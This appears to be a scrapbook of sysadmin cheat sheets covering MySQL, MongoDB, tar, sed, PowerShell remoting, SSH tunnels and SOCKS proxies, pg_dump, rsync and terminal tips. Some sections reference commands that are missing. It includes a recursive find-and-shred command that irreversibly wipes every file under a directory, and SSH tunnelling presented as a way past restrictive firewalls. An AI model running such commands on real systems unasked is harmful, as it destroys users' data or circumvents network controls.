Each cycle’s output is separated by ‘=======’. You can also specify the time delay as ‘-r <seconds>’ or ‘+r <seconds>’.
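For example, to relist that user's open files every 5 seconds (user name reused from the examples above):
# lsof -u lakshmanan -r 5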
SELECT IFNULL(B.engine,'Total') "Storage Engine",
CONCAT(LPAD(REPLACE(FORMAT(B.DSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Data Size", CONCAT(LPAD(REPLACE(
FORMAT(B.ISize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Index Size", CONCAT(LPAD(REPLACE(
FORMAT(B.TSize/POWER(1024,pw),3),',',''),17,' '),' ',
SUBSTR(' KMGTP',pw+1,1),'B') "Table Size"
FROM (SELECT engine,SUM(data_length) DSize,SUM(index_length) ISize,
SUM(data_length+index_length) TSize FROM information_schema.tables
WHERE table_schema NOT IN ('mysql','information_schema','performance_schema')
AND engine IS NOT NULL GROUP BY engine WITH ROLLUP) B,
(SELECT 3 pw) A ORDER BY TSize;
c – create an archive file.
x – extract an archive file.
v – show the progress of the archive file.
f – filename of the archive file.
t – view the contents of an archive file.
j – filter the archive through bzip2.
z – filter the archive through gzip.
r – append or update files or directories in an existing archive file.
W – verify an archive file.
wildcards – specify patterns for the unix tar command.
examples :
- extract : tar -xvf file.tar
- create : tar -cvf archive.tar /path/tofile
- with compression : tar -cvjf archive.tar.bz2 /path/tofile
This command finds every file in the current directory and its subdirectories (-type f) and pipes them (via xargs or -exec) to shred (-n 48: 48 iterations, -z: finish with a pass of zeros, -u: remove the file, -v: verbose, -f: force):
find . -type f -print0 | xargs -0 shred -fuzv -n 48
find . -type f -exec shred -fuzv -n 48 {} \;
Status :
db.serverStatus();
db.help()
show dbs
use
db.cloneDatabase()
load() Executes a specified javascript file.
auth :
mongo admin -u root -p
use admin
db.auth("AdminSTH","AdminSTH")
list users :
show users
db.user.find()
db.user.find().pretty()
db.createUser({"user": "ajitesh", "pwd": "gurukul", "roles": ["readWrite", "dbAdmin"]})
db.user.drop()
show roles :
list collections:
show collections
db.collection.find()
db.printCollectionStats()
db.collection.dataSize() // Size of the collection
db.collection.storageSize() // Total size of the documents stored in the collection
db.collection.totalSize() // Total size in bytes of both collection data and indexes
db.collection.totalIndexSize() // Total size of all indexes in the collection
db.collection.drop()
User management commands :
db.createUser()
db.dropUser()
Sometimes when you connect to old machines you will need this,
because of the error: Unable to negotiate with no matching key exchange method found. Their offer:
-oKexAlgorithms=
-c cipher
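A sketch of using those two options together (the algorithm, cipher and host are illustrative; pick whatever the server's "Their offer" line lists):
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc user@oldhost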
Find every file from the current folder and replace string : find ./ -type f -exec sed -i 's/string1/string2/g' {} \;
How to prepend text quickly in one line multiple files : find . -name "*.txt" -exec sed -i '1s;^;written by Harlok\n;' {} \;
Grep every file containing matchstring in somedir then replace string1 by string2 grep -rl matchstring somedir/ | xargs sed -i 's/string1/string2/g'
grep every file recursively from the current folder which contains the word foo but not with filename bar, and replace string: grep -rl foo . | grep -v bar | xargs sed -i 's/string1/string2/g'
One of the most important steps in optimizing and tuning mysql is to identify the queries that are causing problems. How can we find out what queries are taking a long time to complete? How can we see what queries are slowing down the mysql server? Mysql has the answer for us and we only need to know where to look for it… Normally from my experience if we take the most ‘expensive’ 10 queries and we optimize them properly (maybe running them more efficiently, or maybe they are just missing a simple index to perform properly), then we will immediately see the result on the overall mysql performance. Then we can iterate this process and optimize the new top 10 queries. This article shows how to identify those ‘slow’ queries that need special attention and proper optimization.
1. Activate the logging of mysql slow queries.
The first step is to make sure that the mysql server will log ‘slow’ queries and to properly configure what we are considering as a slow query.
First let’s check on the mysql server if we have slow query logging enabled:
mysqladmin var |grep log_slow_queries
| log_slow_queries | OFF |
If log_slow_queries is ON then we already have it enabled. This setting is by default disabled – meaning that if you don’t have log_slow_queries defined in the mysql server config this will be disabled. The mysql variable long_query_time (default 1) defines what is considered as a slow query. In the default case, any query that takes more than 1 second will be considered a slow query.
Ok, now for the scope of this article we will enable the mysql slow query log. In order to do this, in your mysql server config file (/etc/my.cnf on RHEL/CentOS, /etc/mysql/my.cnf on Debian, etc.), in the mysqld section we will add:
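A sketch of the two directives this describes, using the log path mentioned below (older MySQL versions use these names; recent releases call them slow_query_log and slow_query_log_file):
log_slow_queries = /var/log/mysql/mysql-slow.log
long_query_time = 1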
This configuration will log all queries that take more than 1 sec in the file /var/log/mysql/mysql-slow.log. You will probably want to define these based on your particular setup (maybe you will want the logs in a different location and/or you will consider a higher value than 1 sec to be slow query).
Once you have done the proper configurations to enable mysql to log slow queries you will have to reload the mysql service in order to activate the changes.
2. Investigate the mysql slow queries log.
After we enable slow query logging we can look inside the log file at each slow query that was executed by the server. Various details are logged to help us understand how the query was executed:
Time: how long it took to execute the query
Lock: how long was a lock required
Rows: how many rows were investigated by the query (this can help see quickly queries without indexes)
Host: the actual host that launched the query (this can be localhost, or a different one in multiple servers setup)
The actual mysql query.
This information allows us to see what queries need to be optimized, but on a high-traffic server with lots of slow queries this log can grow very fast, making it very difficult to find any relevant information inside it. In this case we have two choices:
We increase the long_query_time and we focus on the queries that take the most time to complete, and we gradually decrease this once we solve the queries.
We use some sort of tool to parse the slow query log file and have it show us the most used queries.
Of course based on the particular setup we might end up using both methods.
MySQL gives us a small tool that does exactly this: mysqldumpslow. This parses and summarizes the MySQL slow query log. From the manual page here are the options we can use:
-v verbose
-d debug
-s=WORD
what to sort by (t, at, l, al, r, ar etc)
-r reverse the sort order (largest last instead of first)
-t=NUMBER
just show the top n queries
-a don't abstract all numbers to N and strings to 'S'
-n=NUMBER
abstract numbers with at least n digits within names
-g=WORD
grep: only consider stmts that include this string
-h=WORD
hostname of db server for *-slow.log filename (can be wildcard)
-i=WORD
name of server instance (if using mysql.server startup script)
-l don't subtract lock time from total time
For example using:
mysqldumpslow -s c -t 10
we get the top 10 queries (-t 10) sorted by the number of occurrences in the log (-s c). Now it is time to have those queries optimized. This is outside of the scope of this article but the next logical step is to run EXPLAIN on the mysql query and then, based on the particular query to take the appropriate actions to fix it.
mysqldumpslow -s c -t 10 /var/log/mysql_slow_queries.log
NAME
mysqldumpslow – Summarize slow query log files
SYNOPSIS
mysqldumpslow [options] [log_file …]
DESCRIPTION
The MySQL slow query log contains information about queries that take a long time to execute (see Section 5.2.5, “The Slow Query Log”).
mysqldumpslow parses MySQL slow query log files and prints a summary of their contents.
Normally, mysqldumpslow groups queries that are similar except for the particular values of number and string data values. It “abstracts” these values to N and ‘S’ when displaying summary output. The -a and -n options can be used to modify value abstracting behavior.
Invoke mysqldumpslow like this:
shell> mysqldumpslow [options] [log_file ...]
mysqldumpslow supports the following options.
· --help
Display a help message and exit.
· -a
Do not abstract all numbers to N and strings to ‘S’.
· --debug, -d
Run in debug mode.
· -g pattern
Consider only queries that match the (grep-style) pattern.
· -h host_name
Host name of MySQL server for *-slow.log file name. The value can contain a wildcard. The default is * (match all).
· -i name
Name of server instance (if using mysql.server startup script).
· -l
Do not subtract lock time from total time.
· -n N
Abstract numbers with at least N digits within names.
· -r
Reverse the sort order.
· -s sort_type
How to sort the output. The value of sort_type should be chosen from the following list:
· t, at: Sort by query time or average query time
· l, al: Sort by lock time or average lock time
· r, ar: Sort by rows sent or average rows sent
· c: Sort by count
By default, mysqldumpslow sorts by average query time (equivalent to -s at).
· -t N
Display only the first N queries in the output.
· --verbose, -v
Verbose mode. Print more information about what the program does.
rfkill
list [id|type ...]
List the current state of all available devices. The command output format is
deprecated, see the section DESCRIPTION. It is a good idea to check with list
command id or type scope is appropriate before setting block or unblock. Special
all type string will match everything. Use of multiple id or type arguments is
supported.
block id|type [...]
Disable the corresponding device.
unblock id|type [...]
Enable the corresponding device. If the device is hard-blocked, for example via a
hardware switch, it will remain unavailable though it is now soft-unblocked.
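For instance, to check the state of all devices and then soft-block or unblock by type:
rfkill list
rfkill block wifi
rfkill unblock all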
iw dev
iw phy phy0 info
iw phy phy0 interface add mon0 type monitor
iw dev wlan0 del
ifconfig mon0 up
Requirements
Computer running Windows Vista (or higher)
Server running Windows Server 2008 (or higher)
PowerShell 5.0
Administrative access
1: Create a PowerShell session
Command: Enter-PSSession
Creating a PSSession will allow an administrator to remotely connect to a computer on the network and run any number of PS commands on the device. During the session, multiple commands may be executed remotely, since the admin has console access just as though he/she were sitting locally at the machine.
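Example (SERVER01 is a placeholder name): Enter-PSSession -ComputerName SERVER01 -Credential (Get-Credential)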
Using Invoke-Command in PS renders similar results to executing a session as in command #1 above, except that when using Invoke to call forth a command remotely, only one command may be executed at a time. This prevents running multiple commands together unless they are saved as a .PS1 file and the script itself is invoked.
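Example (placeholder names): Invoke-Command -ComputerName SERVER01 -ScriptBlock { Get-Service Spooler }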
Sometimes installations or configurations will require a reboot to work properly. Other times, a computer just needs a refreshing of the resources, and a reboot will accomplish that. Whether targeted at one or one hundred devices, PS can ease the job with just one command for all.
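The cmdlet in question is Restart-Computer; for example (placeholder names): Restart-Computer -ComputerName PC01, PC02 -Force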
The PING command is one of the most useful commands in a sysadmin's arsenal. Simply put, it tests connectivity between your current station and another remote system. Test-Connection brings it up a notch by folding that functionality into a PS cmdlet, while adding some new tricks—such as being able to designate a source computer that's different from the one you're currently logged onto. Say you need to test communications between a server and a remote device. The ICMP requests will be sent from the server to the remote device, yet report the findings back to your admin station.
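Example (placeholder names): Test-Connection -Source SERVER01 -ComputerName DEVICE01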
Services are resilient and sometimes finicky. Depending on what's going on with a particular computer, they may halt at the worst possible time. Determining a station's running services begins with the Get-Service cmdlet to obtain current statuses. Once that information is available, the process to set a service status is possible - be it for one service, those that begin with the letter W, or all of them at once.
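Example (the service names are arbitrary):
Get-Service -Name W*
Set-Service -Name Spooler -Status Running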
6: Run background tasks
Command: Start-Job
Example: Start-Job -FilePath PATH_TO_SCRIPT.PS1
Some administrators do what they need to do when they need to do it, regardless of what's going on or what the users are doing. Others prefer to work in the shadows to keep things humming along with little to no interruptions. If you're one of the latter, this cmdlet is perfect for your management style.
It executes scripts or tasks in the background no matter who is interactively logged on or what they may be doing. Further, it will execute silently—even if it were to fail—and not interrupt the locally logged on user at all. Like a ghost!
Unlike running things silently or rebooting a desktop from afar, there are times when computers need to be shut down. For these moments, this cmdlet will ensure that one or all computers are properly shut down and will even log off interactive users if the -Force argument is included.
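The cmdlet here is Stop-Computer; for example (placeholder names): Stop-Computer -ComputerName PC01, PC02 -Force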
8: Join computers to a domain
Command: Add-Computer
While the process of joining a computer to a domain is fairly straightforward, the three clicks and entering of admin credentials can become quite tedious when multiplied by several hundreds of computers at a time.
PowerShell can make short work of the task. This cmdlet allows for multiple computers at once to be joined to a domain, while requiring the admin to enter his/her credentials only once.
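Example (domain and names are placeholders): Add-Computer -ComputerName PC01, PC02 -DomainName corp.example.com -Credential CORP\Admin -Restart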
9: Manage other applications and services
Command: Import-Module
One of PowerShell's greatest benefits is its flexibility when it comes to managing just about anything—from Windows-based computing systems to applications like Microsoft Exchange. Some applications and system-level services permit only a certain level of management via GUI. The rest is defaulted to PS, so Microsoft is clearly leveraging the technology significantly.
This is accomplished through the use of modules that contain the necessary codebase to run any number of additional cmdlets within PowerShell that target a specific service or application. Modules may be used only when needed by importing them, at which point they will extend the PS functionality to a specific service or app. Once your work is done, you can remove the module from the active session without closing it altogether.
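Example (assumes the RSAT ActiveDirectory module is installed):
Import-Module ActiveDirectory
Remove-Module ActiveDirectory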
Depending on several factors, including the deployment system used, scripting experience level and security, and company policy, computers being renamed might not be done regularly (or perhaps it's a task performed quite often). Either way, the Rename cmdlet is extremely useful when working on one or multiple systems—workgroup or on a domain.
The cmdlet will rename a device and reboot it so that the changes can take effect. For those on a domain, the added benefit is that if the Active Directory schema supports it, renaming the computer will also rename the corresponding computer object in AD. The object will retain all its settings and domain-joined status but will reflect the new name, without any significant downtime for the user beyond a reboot.
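Example (placeholder names): Rename-Computer -ComputerName OLDNAME -NewName NEWNAME -DomainCredential CORP\Admin -Restart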
Switch Radeon GPU: Restart GPUs and switch Polaris Compute Mode, Vega HBCC Memory and Large Pages
Updated on June 6th, 2018 to version 0.9.5
Switch Radeon GPU is a simple command line tool for restarting Radeon based GPUs. It can switch Polaris based GPUs (RX 470/480/570/580) from ‘Graphics Mode’ into ‘Compute Mode’. It also can toggle low level options of Radeon Vega GPUs like HBCC Memory and Large Pages support.
Switch Radeon GPU was developed as part of Cast XMR CryptoNight Miner but could be useful for handling Radeon GPUs for all sorts of workloads in OpenCL compute mode.
Make restarting your Radeon based GPU a breeze:
Switch Radeon GPU 0.9.5 for Windows (64 bit)
Features
Restarts Radeon GPUs
Switch ‘Compute Mode’ on or off (only RX 470/RX 480/RX 570/RX 580)
Switch ‘HBCC Memory’ on or off (only Vega GPUs)
Switch ‘Large Pages’ on or off (only Vega GPUs)
Requirements
Windows 8/8.1/10 64 bit
AMD Radeon RX Vega 56/64 GPU
or AMD Radeon Vega Frontier Edition GPU
or AMD Radeon RX 480/RX 580 GPU
or AMD Radeon RX 470/RX 570 GPU
Radeon Driver 17.1.1 or later for restarting GPUs
Radeon Driver 18.1.1 or later for switching modes
How To
switch-radeon-gpu has a command line interface:
Executing switch-radeon-gpu without any arguments will list all installed Radeon GPUs and their status.
To select which GPU to operate on use the -G switch, e.g. for restarting the 2nd card use:
switch-radeon-gpu -G 1 restart
To select multiple GPUs use the -G switch and list comma separated the GPUs which should be used, e.g. for restarting the 1st and 3rd card use:
switch-radeon-gpu -G 0,2 restart
There are different restart modes:
restart fast restart of the specified GPU; the AMD Radeon Settings app will sometimes not pick up the configuration changes and will display the old state
autorestart only restarts the GPU if necessary due to a change in configuration
fullrestart a more thorough restart of the GPU; the AMD Radeon Settings app will restart as well
If no GPU is specified with the -G option all available GPUs will be restarted!
Following options of the GPU can be switched:
--compute =on switches the GPU into ‘Compute Mode’, =off switches back to ‘Graphics Mode’ (Polaris only)
--hbcc switch HBCC =on or =off (Vega only)
--largepages switch large page support =on or =off (Vega only). Most useful for the Vega Frontier Edition, to better utilize the available 16 GB of memory
For example, to switch all Polaris based GPUs to Compute Mode:
switch-radeon-gpu --compute=on autorestart
To turn the HBCC Memory option off for all Vega based GPUs:
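Following the same pattern as the Polaris example above:
switch-radeon-gpu --hbcc=off autorestart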
The default resolution in most XenCenter VMs is crap. Trying to work with 800x600 resolution is like looking through a submarine porthole. Let's increase the resolution of the VM:
Set the line to the following. You can change the resolutions below to suit your preferred order. The first entry will be used on default. Don't forget you can set it pretty high and then just click the "scale" option in the console window of XenCenter.
Starts the VM Guest graphical output on VNC display number 5 (usually port 5905). The password suboption initializes a simple password-based authentication method. There is no password set by default and you have to set one with the change vnc password command in QEMU monitor:
QEMU 0.12.5 monitor - type 'help' for more information
(qemu) change vnc password
Password: ****
If this fails, I will need to know how it fails, but it denotes some problem I am not aware of. It should work with any standard (VESA) resolution - no, 1366x768 is not a VESA standard and may fail. 1024x768 is a good one to try, as are 1280x1024, 1900x1200, 1920x1080, and many others. 1360x768 is compliant with the standard as well.
If it worked, now type xrandr without any arguments and you'll get a list of available displays. It may list multiple displays - you want to select one that says connected, such as
VGA1 connected 1600x900+1280+0 (normal left inverted right x axis y axis) 443mm x 249mm
Yours may be labeled differently, and will probably read 640x480 instead.
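The modeline referred to in the next step is typically generated with cvt and registered with xrandr --newmode; a sketch for 1024x768 at 60 Hz (the numbers are cvt's output and may differ on your system):
cvt 1024 768 60
xrandr --newmode "1024x768_60.00" 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync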
Take the first word (in my case VGA1) and copy it. Now type 'xrandr --addmode "output name" "the part in quotes from the modeline you calculated earlier, with quotes removed" '
such as:
xrandr --addmode VGA1 1024x768_60.00
If this succeeds, you can set the display mode from the UI (probably), or if that fails by typing
xrandr --output VGA1 --mode 1024x768_60.00
(substituting your values, of course)
To make these survive reboot you can either run the xrandr stuff at startup (make sure it returns zero if you put it in for example your display manager setup scripts, otherwise things changing between boots could cause your DM to hang or constantly restart!), or you can put something in xorg.conf or xorg.conf.d:
Section "Device"
Identifier "Configured Video Device"
Driver "vesa"
EndSection
$client = new-object System.Net.WebClient
$client.DownloadFile("http://www.xyz.net/file.txt","C:\tmp\file.txt")
It works as well with GET queries.
If you need to specify credentials to download the file, add the following line in between:
$client.Credentials = Get-Credential
$computer = gc env:computername
$key = "XXXXX-XXXXX-XXXXX-XXXXX-XXXXX"
$service = get-wmiObject -query "select * from SoftwareLicensingService" -computername $computer
$service.InstallProductKey($key)
$service.RefreshLicenseStatus()
Use the SC (service control) command, it gives you a lot more options than just start & stop.
DESCRIPTION:
SC is a command line program used for communicating with the
NT Service Controller and services.
USAGE:
sc [command] [service name] ...
The optional server parameter has the form "\\ServerName"
Further help on commands can be obtained by typing: "sc [command]"
Commands:
query-----------Queries the status for a service, or
enumerates the status for types of services.
queryex---------Queries the extended status for a service, or
enumerates the status for types of services.
start-----------Starts a service.
pause-----------Sends a PAUSE control request to a service.
interrogate-----Sends an INTERROGATE control request to a service.
continue--------Sends a CONTINUE control request to a service.
stop------------Sends a STOP request to a service.
config----------Changes the configuration of a service (persistent).
description-----Changes the description of a service.
failure---------Changes the actions taken by a service upon failure.
qc--------------Queries the configuration information for a service.
qdescription----Queries the description for a service.
qfailure--------Queries the actions taken by a service upon failure.
delete----------Deletes a service (from the registry).
create----------Creates a service. (adds it to the registry).
control---------Sends a control to a service.
sdshow----------Displays a service's security descriptor.
sdset-----------Sets a service's security descriptor.
GetDisplayName--Gets the DisplayName for a service.
GetKeyName------Gets the ServiceKeyName for a service.
EnumDepend------Enumerates Service Dependencies.
The following commands don't require a service name:
sc
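As an illustration (wuauserv, the Windows Update service, is an arbitrary example; note the mandatory space after "start="):
sc query wuauserv
sc config wuauserv start= auto
sc stop wuauserv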
Ever wanted to unmount the root partition of your little Linux box? No? What for?! Well, I don't know, for instance to perform operations on your root partition (resize it, change the filesystem, repair the fs). Except that normally you cannot unmount the root partition, since your OS lives on that very partition.
Luckily, we live in a wonderful era in which we all have quite a few gigabytes of RAM, which makes the operation possible and even fairly simple. Let's go!
Stop everything that is running
To be able to unmount your partition you will have to stop every process doing disk I/O (lsof will be your friend). This step can be done at the very last moment before the big jump, so as to impact the uptime of your services as little as possible.
If you have enough RAM you can even manage not to stop anything, or just restart the processes, but that is a bit more touchy, especially if you have data that may be modified while everything keeps running.
Recreate your userland in RAM
So the goal of the game is to create a root partition, but in RAM. First step: create a mount point with mkdir /ramroot and then mount a tmpfs on it with mount -t tmpfs none /ramroot.
From now on, everything you put into /ramroot will live not on your hard disk but in your RAM.
At this point there are two options: either your root partition fits in your RAM (the simplest case), or you don't have enough RAM and you will have to rebuild a root from scratch (I won't cover that here, but basically you either copy only the bare minimum of your rootfs, or you grab a rootfs from the interwebs).
So: cp -ax /{bin,etc,sbin,lib32,lib64,lib} /ramroot, then, to save some RAM, mkdir /ramroot/usr followed by cp -ax /usr/{bin,sbin,lib32,lib64} /ramroot/usr. There we go, we have the whole userspace!
All of it? Not quite. The "special" mounts are still missing.
So: mkdir /ramroot/dev /ramroot/sys /ramroot/proc to create the mount points. Since these already exist on your disk, we simply bind-mount them: mount --rbind /dev /ramroot/dev, then mount --rbind /sys /ramroot/sys, and finally mount -t proc none /ramroot/proc, and we're all set.
The big jump
You now have a nice userspace available in your ramdisk, so we can decide to migrate into it.
First, mkdir /ramroot/oldroot will receive our hard disk. And now the miracle command:
pivot_root /ramroot /ramroot/oldroot
And now your root is your ramdisk. You can umount /dev/sda2 and admire your hard work.
You can now do whatever it was you wanted to do. Beautiful, isn't it? In the end it is devilishly simple and really effective.
Going back
You want to go back without rebooting? Easy: just mount /dev/sda2 /oldroot and finally pivot_root /oldroot /oldroot/ramroot, and poof, you are out of your ramdisk and back on your partition.
Author: lord
https://lord.re/posts/58-pivot_root-unmount-son-root/
How many times has it happened to you that you no longer know whether you are on a remote SSH session or on a local terminal? For me it happens all the time. Well, it used to. I found a little trick that changes everything: changing a terminal's background colour on the fly!
Yep, there is an escape sequence that performs this little miracle, provided your terminal supports it (xterm does, and alacritty very soon). The magic sequence is \033]11;#rrggbb\007. There you go.
How do you use it? Easy! Edit your /etc/ssh/ssh_config and add:
PermitLocalCommand yes
LocalCommand /bin/echo -e "\033]11;#440044\007"
And bam: on the next ssh connection a magnificent purple background will jump out at you. Beware though, this will break scp. But how do you restore the background when you come back? That requires a small trick, described below. You can also set a different colour per ssh destination, either on the client side by editing your ~/.ssh/config (a bit annoying since it stays local), or by editing the init script of the remote shell. Personally I add the famous echo to /etc/zsh/zshrc with different colours on each machine; that way it works whatever the source machine is.
To get the original colour back you have to cheat a little. In my case I use zsh, to which I added a nice little feature that times every command I run and displays the duration in the prompt. For that I have a file /etc/zsh/prompt.zsh containing two functions: preexec(), which sets a timer variable, and precmd(), which reads the timer, computes the elapsed seconds and prints the result in the RPROMPT. Nothing exotic so far. All you have to do is add the /bin/echo to precmd() and you are done. Since this function runs after every command, when you exit an ssh session you get the desired colour back.
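A minimal sketch of that precmd() hook (the colour value is a placeholder for your local background):
precmd() {
/bin/echo -e "\033]11;#000000\007"
}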
For now it is almost as effective as a molly-guard. Time will tell whether I get too used to it, though.
Author: lord
https://lord.re/posts/49-changer-couleur-fond-terminal
Because it is the funniest of them all, it deserves a small spot here: Cancer. Yep, the Cancer terminal. Subtle and cheerful. It is written in Rust and fairly simple. It supports sixel, which is quite fun but frankly a gimmick. I have not tested it much beyond that.
One of my favourites is st. It is a very simple term. No config file: if you want to change a setting you have to do it in config.h and recompile. In the end that file is well enough laid out, and compilation is so fast, that it is not really slower than editing a regular config file. I used it for a very long time. It is made by the good folks at Suckless, who are keen on building tools that are as unbloated as possible, with very few lines of code. It is fast and even supports truecolor. On the other hand there is no scrollback; that can be annoying at first but you get used to it just fine. I kept it for a few years without trouble.
But I discovered a newcomer, the surprising Alacritty. It is simple: no GUI, a small well-commented config file, few silly features, and it is a bit hungrier than st. Written in Rust, its claim to fame is being the fastest. And well… it really is fast! All the rendering is actually done in OpenGL, so making it chew through dozens of lines becomes instantaneous. You can even play with libcaca in "high resolution" (yes, by choosing a tiny font to get small enough pixels, and it stays fairly smooth). It is very young and therefore still a bit rough around the edges (small graphical glitches in very rare cases), but that also means it is possible to influence its development a little. A small community has already formed. I think it has quite a future. In short, it is my new toy of the moment.
Author: lord
https://lord.re/posts/48-emulateurs-terminaux/
A few tips for making good use of the patch command.
The diff command
This command finds the differences between two files: it returns the line from the original file and the modified line. It is what we will use to create the patch that we can then apply. There are several patch formats; the most widespread is the unified patch, because it is flexible to apply and tolerates some variation in the file being patched.
The patch command
The patch command takes the output of diff as input and applies the changes to the designated file. Having both the original and the modified version in the patch avoids patching the wrong file, or even patching a file that is already up to date.
Example:
diff -aburN --exclude=CVS* repertoire/reference/ repertoire/modifie/ > patch.diff
This command creates a unified patch. The options used:
-a : treat all files as text
-b : ignore differences in whitespace
-u : produce a unified patch
-r : recurse into subdirectories
-N : handle new files
--exclude=CVS : exclude files or directories from the comparison.
The patch built this way contains the information the patch command needs to find the files to modify within the directory tree, and then to find the right lines, even if they have moved slightly.
patch -p 1 < patch.diff
The -p N option adapts the directory structure recorded in the patch to the tree you are currently working on.
For all the operations that follow, you must be logged in as the postgres user:
%> su - postgres
Dumping a database
The pg_dump command prints the structure of a database nom_de_la_base, as well as its data, on standard output.
By redirecting standard output to a file, you thus obtain a copy of the database.
%> pg_dump -D {nom_de_la_base} > {nom_du_fichier.dump}
Recreating a database from a dump
If you need to restore a database, or to build a new one from an existing database, you use a dump file.
First, drop the existing database if necessary:
%> dropdb {nom_de_la_base}
Second, recreate or create the database:
%> createdb {nom_de_la_base}
Third, import the dump file into the database:
%> psql -e {nom_de_la_base} < {nom_du_fichier.dump}
The dump can also be imported while connected to the database (useful when the postmaster requires password authentication [1]), using the psql command:
nom_de_la_base=# \i {nom_du_fichier.dump}
The database is thus created and initialized with the structure and data declared in the dump file. Since the dump is plain text, it is very easy to edit.
PS: In all cases, for this to work the PostgreSQL database server must be running on the machine. Forgetting to start it is a common mistake.
[1] because in that case standard input cannot be redirected
The goal of this document is to explain SSH tunnels, that is, how to use SSH to carry other protocols, which secures the communication (a kind of software VPN). If you want more details on the various possibilities, this article by Buddhika Chamith will enlighten you: SSH Tunneling Explained.
When you connect to the Internet from a public place and that location does not allow access to particular ports of a server (restrictive firewall rules), you can use an intermediate server on which you have a user account and which runs an ssh server. That server is the one that will connect to the desired destination. This solution also encrypts the communication between the access point and the intermediate server.
To achieve this we will use an SSH tunnel. We therefore need access to port 22 of the intermediate server, but in 90% of cases firewalls let outgoing traffic through on this port.
The principle
You create an ssh connection between the client PC and the intermediate server. This connection (the tunnel) links a port of the client PC to the intermediate server, which reads everything it receives over that connection and forwards it on to the destination server.
Note: on Linux, you cannot bind the tunnel to a privileged local port unless you are root, so pick a port above 2000.
Example
I want to read my mail over IMAP. My imap server is imap.mail.com and I query it on port 143 (the default IMAP port). But the firewall does not let connections to port 143 out.
So I will establish an SSH tunnel between the PC I am using and a server on which I have ssh access. That server is called monserveurssh.com and my user login is moncompte. I will bind the tunnel to port 2000 of my client PC.
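A command along these lines does the trick (reconstructed from the options described just below):
ssh -2 -N -f -C -L 2000:imap.mail.com:143 moncompte@monserveurssh.com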
This command does not log me in on the intermediate server but gives me my prompt back immediately, thanks to the -f option combined with -N. The -2 option asks ssh to use protocol v2, and -C asks it to compress the tunnel.
All that is left is to point my mail client at port 2000 of localhost, and I can read my mail as if I were connected directly to the mail server.
A security detail
When I create user accounts on my server just to allow port forwarding, I do not grant them login access. To do so, in /etc/passwd I replace the account's shell with /sbin/nologin. That way the person owning the account can create SSH tunnels but cannot log in to the server.
On Windows
Using Cygwin and the ssh client shipped with it, this works very well. Putty can also establish tunnels, for those allergic to the command line.
A few links on the subject
Remote Desktop and SSH tunneling,
X over SSH2,
Putty documentation in French, with a section on port forwarding
Making a backup with rsync
You can use ssh to back up a remote machine (handy for keeping a copy of a website while only downloading what has changed since the last backup) with rsync:
rsync -v -u -a --rsh=ssh --stats user@serveur.net:/chemin/dossier/distant/a/sauver /chemin/dossier/local
Nothing simpler: open your command line and type:
~$ ssh -fC -D 8080 tunnel@example.org
With this command you connect as user ‘tunnel‘ on the machine ‘example.org‘, and the tunnel is reachable locally on port 8080. To check that the tunnel is indeed there:
~$ netstat -apnt
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
[…]
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 4464/ssh
[…]
We are happy: SSH is indeed listening on port 8080.
Check our IP
Before using the proxy, let's check our public IP address. Once the browser is configured to use the proxy, it should be different and match the IP address of the SSH server being used.
There are plenty of services for discovering your IP address: ipso.me.
Configure Firefox to use the SOCKS proxy
In Firefox, open the “Edit > Preferences” menu, and in the dialog choose the “Advanced” tab, then “Network”, and finally the “Settings” button:
Firefox Preferences
Choose the “Manual proxy configuration” option; this enables a whole series of input fields. In the “SOCKS Host” field enter “127.0.0.1”, our loopback address (adapt to your configuration), and in the “Port” field enter “8080”, the tunnel's listening port. Then make sure “SOCKS v5” is selected, like this:
Connection Settings
You think you are done, but no, one last killer detail is missing: proxying DNS requests. On Firefox they do not go through the SOCKS proxy by default. Other browsers reportedly do this, but Firefox has to be forced. To do so, open (1) “about:config” (type “about:config” in the address bar), then search (2) for the entry “network.proxy.socks_remote_dns”, which is “false” by default. Double-click (3) the corresponding line to switch the value to “true”:
about:config - Mozilla Firefox
Verify
Go back to your favourite site to discover your IP address, and voilà:
IPso.me discovers my IP address - after the proxy
All is for the best in the best of all possible worlds.
Note: Firefox is not the only browser in life. To launch Chromium in incognito mode and have it use the SOCKS proxy without DNS leaks, according to this page on the chromium.org site you do it like this:
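The invocation looks roughly like this (flags as documented by the Chromium project; verify against that page):
chromium --incognito --proxy-server="socks5://127.0.0.1:8080" --host-resolver-rules="MAP * ~NOTFOUND , EXCLUDE 127.0.0.1"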
rsync options source destination
-v : verbose
-r : copies data recursively (but does not preserve timestamps and permissions while transferring data)
-a : archive mode, archive mode allows copying files recursively and it also preserves symbolic links, file permissions, user & group ownerships and timestamps
-z : compress file data
-h : human-readable, output numbers in a human-readable format
-e : specify a protocol
--progress : show progress during the transfer
--include / --exclude : these two options allow us to include and exclude files by specifying patterns; they let us name the files or directories we want included in the sync and exclude the files and folders we do not want transferred.
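For example, a typical invocation combining several of these options (host and paths are placeholders):
rsync -avzh -e ssh --progress user@server:/remote/dir /local/dir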
Split Terminal Horizontally – Ctrl+Shift+O
Split Terminal Vertically – Ctrl+Shift+E
Move Parent Dragbar Right – Ctrl+Shift+Right_Arrow_key
Move Parent Dragbar Left – Ctrl+Shift+Left_Arrow_key
Move Parent Dragbar Up – Ctrl+Shift+Up_Arrow_key
Move Parent Dragbar Down – Ctrl+Shift+Down_Arrow_key
Hide/Show Scrollbar – Ctrl+Shift+s
Search for a Keyword – Ctrl+Shift+f
Move to Next Terminal – Ctrl+Shift+N or Ctrl+Tab
Move to the Above Terminal – Alt+Up_Arrow_Key
Move to the Below Terminal – Alt+Down_Arrow_Key
Move to the Left Terminal – Alt+Left_Arrow_Key
Move to the Right Terminal – Alt+Right_Arrow_Key
Copy a text to clipboard – Ctrl+Shift+c
Paste a text from Clipboard – Ctrl+Shift+v
Close the Current Terminal – Ctrl+Shift+w
Quit the Terminator – Ctrl+Shift+q
Toggle Between Terminals – Ctrl+Shift+x
Open New Tab – Ctrl+Shift+t
Move to Next Tab – Ctrl+page_Down
Move to Previous Tab – Ctrl+Page_up
Increase Font size – Ctrl+(+)
Decrease Font Size – Ctrl+(-)
